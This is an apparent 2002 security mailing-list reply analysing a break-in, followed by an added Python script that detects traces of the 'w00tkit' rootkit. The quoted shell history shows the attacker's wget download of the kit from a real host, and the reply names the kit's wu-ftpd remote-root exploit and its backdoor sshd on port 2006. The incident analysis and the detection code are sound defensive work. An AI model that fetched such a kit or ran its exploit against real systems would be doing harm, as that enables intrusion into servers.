From: Rico Gloeckner (rico_at_noris.net)
Date: Fri Sep 13 2002 - 04:17:40 CDT

    On Wed, Sep 11, 2002 at 08:15:42PM -0700, Ver Allan Sumabat wrote:
    > 21 - wu-ftpd-2.6.1-20
    > 22 - openssh-3.1
    > 443 - tomcat-3.2.4
    >
    > 1. this is the content of /home/war's .bash_history:
    >
    > wget http://mrunix.free.fr/roy/w00tkit.tgz

    There we go.

    Getting the kit and grepping through the binaries reveals:

    7350wurm:^^^^7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
    wus:^2.6.0^aw+^wus.log^^^wu-scan by yonezet (yonezethotmail.co.il)

    Since the attackers probably used the same rootkit to crack your machine,
    wuftpd was the target. (No ssh exploit in the w00tkit package, AFAICS; but
    it seems to open another sshd on port 2006.)

    Also, the tgz even contains a core file:
    core: ELF 32-bit LSB core file Intel 80386, version 1 (SYSV), SVR4-style, from 'pstree'
    The core file shows that the machine (which dumped the core, not
    yours) had several processes running, including various bouncers (IRC
    proxies), at least one eggdrop (IRC bot) and various scan programs.

    Another fact is that the other sshd (port 2006) has a static
    sshd_random_seed file. I wonder if one can use that to fingerprint
    hacked machines.

    I only did a fast grep over the files, though, so one might find more
    interesting things.

            -rico
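
    A minimal way to automate the two checks Rico did by hand above (grepping
    the kit's binaries for version banners, and treating an identical
    sshd_random_seed on several hosts as a fingerprint of the kit's sshd), as
    an added example that is not part of the original message and not code
    from the w00tkit author. The directory tree it scans is constructed
    inline, the seed bytes and ELF padding are invented, and only the two
    banner strings are taken from the grep output quoted in the post.

```python
"""Indicator scan for the w00tkit traces described in the post.

Added example, not from the original message or the kit.  It does two
things the poster did by hand:
  1. searches every regular file under a directory for the banner strings
     that the poster's grep turned up in 7350wurm and wus;
  2. hashes any file named sshd_random_seed, so that the same digest showing
     up on several hosts points to a seed shipped with the kit rather than
     one generated on the box.
The sample tree built by build_sample_tree() is constructed for the demo;
the seed bytes and the binary padding are invented, only the two indicator
strings come from the post.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# Banner fragments quoted in the post's grep output (kept as bytes because
# the files are ELF binaries, not text).
KIT_STRINGS = {
    b"7350wurm - x86/linux wuftpd <= 2.6.1 remote root": "7350wurm (wu-ftpd exploit)",
    b"wu-scan by yonezet": "wus (wu-ftpd scanner)",
}
SEED_NAME = "sshd_random_seed"


def scan_tree(root):
    """Walk *root*; return (hits, seeds).

    hits  -> list of (relative posix path, label) per indicator string found
    seeds -> dict {relative posix path: sha256 hex} per sshd_random_seed file
    """
    root = Path(root)
    hits, seeds = [], {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        for needle, label in KIT_STRINGS.items():
            if needle in data:
                hits.append((rel, label))
        if path.name == SEED_NAME:
            seeds[rel] = hashlib.sha256(data).hexdigest()
    return hits, seeds


def static_seed_hashes(seed_maps):
    """Given the seed-hash maps of several hosts, return the digests that
    recur on more than one host.  A seed file should be unique per machine,
    so a digest shared across hosts was copied in, not generated locally."""
    counts = {}
    for seeds in seed_maps:
        for digest in set(seeds.values()):
            counts[digest] = counts.get(digest, 0) + 1
    return {d for d, n in counts.items() if n > 1}


def build_sample_tree(base):
    """Constructed sample host: an unpacked fake kit plus a clean sshd dir.
    The ELF header/padding and the seed contents are invented."""
    base = Path(base)
    kit = base / "w00tkit"
    kit.mkdir(parents=True)
    (kit / "7350wurm").write_bytes(
        b"\x7fELF" + b"\0" * 16
        + b"7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)\0")
    (kit / "wus").write_bytes(b"\x7fELF" + b"\0" * 16 + b"wu-scan by yonezet\0")
    (kit / "ssh").mkdir()
    (kit / "ssh" / SEED_NAME).write_bytes(b"STATIC-SEED-FROM-KIT" * 4)  # invented
    clean = base / "etc" / "ssh"
    clean.mkdir(parents=True)
    (clean / SEED_NAME).write_bytes(os.urandom(512))  # per-host seed, differs
    (clean / "sshd_config").write_text("Port 22\n")
    return base


def demo():
    """Build two constructed hosts, scan both, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        host_a = build_sample_tree(Path(tmp) / "hostA")
        host_b = build_sample_tree(Path(tmp) / "hostB")
        hits_a, seeds_a = scan_tree(host_a)
        _, seeds_b = scan_tree(host_b)
        return {
            "hits": sorted(label for _, label in hits_a),
            "seed_files_per_host": len(seeds_a),
            "shared_seed_hashes": static_seed_hashes([seeds_a, seeds_b]),
            "kit_seed_hash": seeds_a["w00tkit/ssh/sshd_random_seed"],
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

    The string matches only find kits whose banners were not stripped or
    repacked, so they are a quick triage, not proof of a clean host. The seed
    comparison needs at least two scanned machines (or one known-good seed
    hash to compare against); on a single box the kit's seed looks like any
    other file until its digest turns up somewhere else.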

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com